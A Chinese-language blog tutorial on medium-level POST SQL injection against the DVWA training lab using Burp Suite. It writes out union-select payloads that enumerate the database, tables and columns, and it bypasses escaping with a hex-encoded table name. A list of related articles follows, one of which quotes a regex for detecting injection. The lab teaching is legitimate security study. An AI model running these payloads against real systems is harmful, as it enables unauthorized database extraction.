POST注入借助Burpsuite工具

将DVWA Security调到Medium

1,查询User ID为3,点击Submit,先分析一下php源代码

首先我们可知这是POST型,先检查一下User Id 是否为空,如果为空执行下列操作,先赋值id,然后转义在 SQL 语句中使用的字符串中的特殊字符。之后在数据库中查询数据,将结果输出给result,从结果集中取得一行关联数组赋值到row,依次输出first name,sunname。最后关闭函数。因为稍后再index.php page使用,所以我们可以在此处进行设置,以便我们可以像在其余源脚本中一样在此处关闭数据库连接

2.函数分析

(1)mysqli_fetch_row():从结果集中取得一行,并作为枚举数组返回。

(2)mysqli_real_escape_string():转义在 SQL 语句中使用的字符串中的特殊字符。

其余函数在初级文档说明,在此篇不做重复阐述

3.进行实际操作

在bp软件中,当USER ID=3时,出现如下界面,为了方便,我们把他转到Repeater下,点击Action,然后Send to Repeater

在箭头指向部分将id=3改为id=3’,然后点击Go

在id=3’时会出现如下错误,这是因为有转义字符\,单引号失效,需要进行绕过,后续会讲怎样绕过。

sql语句查询列数,在箭头那输入id=3 order by 2后点击Go,出现右面的结果

sql语句查询位置输入id=3 union select 1,2#

sql语句查询数据库名3 union select database(),2#

sql语句查询数据表名3 union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#

查询user表中列名

(对方使用转义字符屏蔽’ , “等特殊字符,使用绕过方法,可以使用users对应的ascii码进行绕过)id=3 union select group_concat(column_name),2 from information_schema.columns where table_name =’users’#

如何找users的ASCII,在Decoder中的Encode as 下找到ASCII hex就可出下面的

id=3 union select group_concat(column_name),2 from information_schema.columns where table_name =0x7573657273#

获取数据

本文介绍的是中级SQL注入,将持续更新SQL注入高级以及盲注,欢迎大家点赞和收藏,您的支持是我创作的最大动力!

sql 数组_sql注入中级相关推荐

  1. mysql %3c%3e sql优化_SQL注入技术和跨站脚本攻击的检测(2)

    2.3 典型的 SQL 注入攻击的正则表达式 /\w*((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix 解释: \w* - 零个或多个字符或者下划线 ...

  2. java sql数组_Sql数组类型解决方案

    众所周知,Sql里面居然没有数组类型,让大家每次在存储过程或者触发器中处理数组的时候都很麻烦.我也遇到这样的情况,所以就特意写了两个自定函数,以 方便自己今后在Sql中处理数组.入行不久,懂得不多,贴 ...

  3. concat mysql sql注入_sql注入-mysql注入基础及常用注入语句

    最近在教学中,关于SQL注入,总发现学生理解起来有些难度,其实主要的原因是对各类数据库以及SQL语句不熟悉,今天先介绍mysql注入需要掌握的基础, Mysql内置information_schema ...

  4. sql 数据库前两列值乘_SQL注入原理和方法汇总

    本文首发于先知社区 前言: SQL注入是web安全中最常见的攻击方式,SQL注入有很多方法,但如果只知道payload,不知道原理,感觉也很难掌握,这次就总结一下我所遇到的SQL注入方法,原理分析+题 ...

  5. sql通用防注入程序php,sql通用防注入系统_PHP教程

    sql通用防注入系统 本文章提供这款防sql注入代码是一款php sql 双过滤非法字符的函数,他可以根据用户自定的防sql注入哦,先是过滤一些sql命令,再是就是把post get 过滤一次,最好验 ...

  6. sql 整改措施 注入_防止SQL注入的五种方法

    一.SQL注入简介 SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库. 二.SQL注入攻击的总体 ...

  7. 过滤SQL关键字 防注入

    /// <summary>/// 过滤SQL关键字 防注入/// </summary>/// <param name="sWord">来自用户输 ...

  8. sql显错注入靶机演示

    sql注入漏洞作为web层面最高危的漏洞之一,本文将手动演示sql显错注入的整体流程 注:禁止用于实战 那么开始正文部分,首先打开我们的靶场猫舍 http://cntj8003.ia.aqlab.cn ...

  9. 如何有效避免mysql注入_sql注入方式及如何有效避免

    先来看下这段sql $query = 'SELECT * from user where name =" '.$name.' "'; 这样的sql是我们经常有写的, 然后$name ...

最新文章

  1. java中example函数作用_MyBatis逆向工程中的Mapper接口以及Example的实例函数及详解...
  2. 今晚直播 | 来自《简明的 TensorFlow 2》作者,Google开发者专家的分享
  3. python 培训-Python培训
  4. 愤怒的小鸟(爆搜,剪枝)
  5. anki 插入表格_anki|建造师选择题制作的方法
  6. STM32 HAL库、标准外设库、LL库(STM32 Embedded Software)
  7. python中的str与expr的一个区别例子
  8. groovy java_在java中使用groovy怎么搞
  9. 子进程中获取父进程id_进程全家桶,看这一篇就够了 | 原力计划
  10. php 跟踪邮件,php – 电子邮件跟踪 – GMail
  11. OpenShift 4 - 通过 secret 访问受保护的镜像
  12. php做上位机,开发过usb上位机驱动的大虾请看一下(附图)
  13. Java json字符串转Object
  14. 极域电子书包课堂管理系统_朝阳群众说小康 | 从黑板课本到VR互动课堂、电子书包,朝阳的课堂如此有趣!...
  15. Siemens M65...
  16. 使用Selenium启动火狐浏览器
  17. mysql的max_allowed_packet配置
  18. web im环信陌生人聊天或客服聊天功能
  19. 托福高频真词List12 // 附托福TPO阅读真题
  20. Lumen为《堡垒之夜:大逃杀》第四章带来实时全局光照

热门文章

  1. spring同类调用事务不生效-原因及三种解决方式
  2. Spark内存管理(1)—— 静态内存管理
  3. Java多线程(三)之ConcurrentHashMap深入分析
  4. 说说MaxTenuringThreshold这个参数
  5. 2019.01.19-2018年6月NEYC集训sequence
  6. 面对这么多困境,梅耶尔还能怎么应对?
  7. iOS数据存储——沙盒。
  8. 怎样在Ubuntu系统安装可用的QQ
  9. Script:Collect vip resource Diagnostic Information
  10. linux5.4+resin4.0.14+jdk1.6+JDBC篇